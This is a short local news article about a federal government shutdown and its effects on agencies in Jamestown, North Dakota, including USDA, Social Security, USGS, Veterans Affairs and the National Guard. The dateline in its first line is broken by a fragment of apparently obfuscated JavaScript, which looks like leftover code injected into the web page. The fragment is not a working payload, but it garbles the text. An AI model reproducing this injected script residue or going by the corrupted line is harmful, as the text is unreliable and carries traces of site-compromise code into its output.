JAMESTOWN, hstkt|var|u0026u|referrer|satsd||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – With the Federal Government shut down, workers in federal agencies are shutting down operations.

In Jamestown, those agencies include the U.S. Department of Agriculture, Social Security Administration, U.S. Geological Survey, and Department of Veterans Affairs.

The USDA Farm Agency in North Dakota has closed and U.S. Geological Survey’s Wildlife Research Center in Jamestown has temporarily laid off employees without pay until a budget is in place.

All veterans’ medical services are not affected and all Veterans Affairs medical facilities and clinics will remain open. Veterans Affairs are suspending appeals of claims and outreach and public awareness activities throughout the shutdown.

Social Security Administration offices throughout the state and nation, including Jamestown, will remain open but with limited services.

A report from the North Dakota National Guard says about 430 employees will likely be told to go home. Adjutant Major General David Sprynczynatyk says he plans to meet with Guard workers about staffing.

The North Dakota National Guard has roughly 1,150 full-time employees. All paid by the federal government.
